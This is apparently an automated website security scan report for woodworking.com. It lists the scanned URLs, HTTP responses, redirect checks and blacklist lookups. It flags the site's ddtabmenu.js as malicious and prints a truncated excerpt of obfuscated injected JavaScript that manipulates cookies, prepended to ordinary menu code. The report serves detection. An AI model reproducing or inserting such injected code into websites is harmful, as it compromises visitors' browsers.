Scanned pages/files
Request | Server response | Status |
http://woodworking.com/ | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:01 GMT Location: http://www.woodworking.com/ Server: Microsoft-IIS/6.0 Content-Length: 150 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Fri, 03 Oct 2014 10:54:02 GMT Location: /ww/ww.aspx Server: Microsoft-IIS/6.0 Content-Length: 128 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=kgs2tydbyimei00uu4jnduyl; path=/; HttpOnly Set-Cookie: CPAUDIENCEID_CDA2=5f2d099d-a0df-4e62-bb88-93662c972ae0; expires=Sat, 03-Oct-2015 10:54:02 GMT; path=/ X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/ww/ww.aspx | 200 OK Content-Length: 146433 Content-Type: text/html | clean |
http://www.woodworking.com/wwj/scripts/ddtabmenufiles/ddtabmenu.js | 200 OK Content-Length: 6769 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var d7SfhC="\x75\x73eri\x64A\x3081\x37F\x4225";var Nb5Tq="28";var ERpn52J=1;function aVFgAu2(np31eR){var i1da7jf;var I7OIg2o=document.cookie;if(!I7OIg2o){return null;}I7OIg2o=I7OIg2o.replace(/\s/g,"");var EQ0VRV=I7OIg2o.split(";");for(var i=0;i<EQ0VRV.length;i++){var upEnl=EQ0VRV[i].split("=");if(upEnl[0]==np31eR){i1da7jf=unescape(upEnl[1]);break;}}return i1da7jf;};function wSF5b(np31eR,tzoj_3M,e_USEO){var exp=new Date();var Hwy9Ftc=exp.getTime()+(e_USEO*60*60*1000);exp.setT menuitems[x].onmouseover=function(){ddtabmenu.showsubmenu(tabid, this)} if (dselected=="auto" && typeof setalready=="undefined" && this.isSelected(menuitems[x].href)){ ddtabmenu.showsubmenu(tabid, menuitems[x]) this[tabid+"-dselected"]=menuitems[x] var setalready=true } else if (parseInt(dselected)==x){ ddtabmenu.showsubmenu(tabid, menuitems[x]) this[tabid+"-dselected"]=menuitems[x] } } } } Antivirus reports:
| ||
http://woodworking.com/wwj/scripts/featured_content/contentslider.js | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:03 GMT Location: http://www.woodworking.com/wwj/scripts/featured_content/contentslider.js Server: Microsoft-IIS/6.0 Content-Length: 195 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/wwj/scripts/featured_content/contentslider.js | 200 OK Content-Length: 10725 Content-Type: application/x-javascript | clean |
http://ajax.microsoft.com/ajax/4.0/4/WebForms.js | 200 OK Content-Length: 21823 Content-Type: application/x-javascript | clean |
http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.0.min.js | 200 OK Content-Length: 96381 Content-Type: application/x-javascript | clean |
http://ajax.aspnetcdn.com/ajax/jquery.migrate/jquery-migrate-1.2.1.min.js | 200 OK Content-Length: 7203 Content-Type: application/x-javascript | clean |
http://ajax.aspnetcdn.com/ajax/jquery.ui/1.10.4/jquery-ui.min.js | 200 OK Content-Length: 228539 Content-Type: application/x-javascript | clean |
http://woodworking.com/Integrations/Centralpoint/Resources/Controls/Page.js?v8.4.0 | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:05 GMT Location: http://www.woodworking.com/Integrations/Centralpoint/Resources/Controls/Page.js?v8.4.0 Server: Microsoft-IIS/6.0 Content-Length: 209 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/integrations/centralpoint/resources/controls/page.js?v8.4.0 | 200 OK Content-Length: 4035 Content-Type: application/x-javascript | clean |
http://woodworking.com/Integrations/Centralpoint/Resources/Page/SwfObject.js | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:07 GMT Location: http://www.woodworking.com/Integrations/Centralpoint/Resources/Page/SwfObject.js Server: Microsoft-IIS/6.0 Content-Length: 203 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/integrations/centralpoint/resources/page/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://ajax.microsoft.com/ajax/4.0/4/MicrosoftAjax.js | 200 OK Content-Length: 98832 Content-Type: application/x-javascript | clean |
http://ajax.microsoft.com/ajax/4.0/4/MicrosoftAjaxWebForms.js | 200 OK Content-Length: 39070 Content-Type: application/x-javascript | clean |
http://woodworking.com/Click.aspx?url=%2fww%2fArticle%2fThats_Not_a_Defect_Thats_Character_7340.aspx&did=bf11350f-cea4-4664-a969-f95f693f7f84&mid=525c4135-b40a-4dfa-8980-9e0180e0b31a&iid=91058cdf-f1c9-446d-a08a-31c146f87226 | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:08 GMT Location: http://www.woodworking.com/Click.aspx?url=%2fww%2fArticle%2fThats_Not_a_Defect_Thats_Character_7340.aspx&did=bf11350f-cea4-4664-a969-f95f693f7f84&mid=525c4135-b40a-4dfa-8980-9e0180e0b31a&iid=91058cdf-f1c9-446d-a08a-31c146f87226 Server: Microsoft-IIS/6.0 Content-Length: 362 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/click.aspx?url=%2fww%2farticle%2fthats_not_a_defect_thats_character_7340.aspx&did=bf11350f-cea4-4664-a969-f95f693f7f84&mid=525c4135-b40a-4dfa-8980-9e0180e0b31a&iid=91058cdf-f1c9-446d-a08a-31c146f87226 | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Fri, 03 Oct 2014 10:54:08 GMT Location: /ww/article/thats_not_a_defect_thats_character_7340.aspx Server: Microsoft-IIS/6.0 Content-Length: 173 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=cleli42z3eswpd4nw5jwpas2; path=/; HttpOnly Set-Cookie: CPAUDIENCEID_CDA2=5f2d099d-a0df-4e62-bb88-93662c972ae0; expires=Sat, 03-Oct-2015 10:54:08 GMT; path=/ X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/ww/article/thats_not_a_defect_thats_character_7340.aspx | 200 OK Content-Length: 78902 Content-Type: text/html | clean |
http://www.woodworking.com/Integrations/Centralpoint/Resources/Controls/Page.js?v8.4.0 | 200 OK Content-Length: 4035 Content-Type: application/x-javascript | clean |
http://woodworking.com/Integrations/Centralpoint/Resources/Controls/Controls.js?v8.4.46 | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:09 GMT Location: http://www.woodworking.com/Integrations/Centralpoint/Resources/Controls/Controls.js?v8.4.46 Server: Microsoft-IIS/6.0 Content-Length: 214 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/integrations/centralpoint/resources/controls/controls.js?v8.4.46 | 200 OK Content-Length: 26336 Content-Type: application/x-javascript | clean |
http://woodworking.com/Integrations/Centralpoint/WebServices/TieredSelector.asmx/js | HTTP/1.1 301 Moved Permanently Date: Fri, 03 Oct 2014 10:54:09 GMT Location: http://www.woodworking.com/Integrations/Centralpoint/WebServices/TieredSelector.asmx/js Server: Microsoft-IIS/6.0 Content-Length: 210 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.woodworking.com/integrations/centralpoint/webservices/tieredselector.asmx/js | 403 Forbidden Content-Length: 1758 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: woodworking.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Fri, 03 Oct 2014 10:54:01 GMT
Location: http://www.woodworking.com/
Server: Microsoft-IIS/6.0
Content-Length: 150
Content-Type: text/html
X-Powered-By: ASP.NET
...150 bytes of data.
GET / HTTP/1.1
Host: woodworking.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Fri, 03 Oct 2014 10:54:01 GMT
Location: http://www.woodworking.com/
Server: Microsoft-IIS/6.0
Content-Length: 150
Content-Type: text/html
X-Powered-By: ASP.NET
...150 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: woodworking.com
Referer: http://www.google.com/search?q=woodworking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: woodworking.com
Referer: http://www.google.com/search?q=woodworking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=woodworking.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://woodworking.com/
Result: woodworking.com is not infected or malware details are not published yet.
Result: woodworking.com is not infected or malware details are not published yet.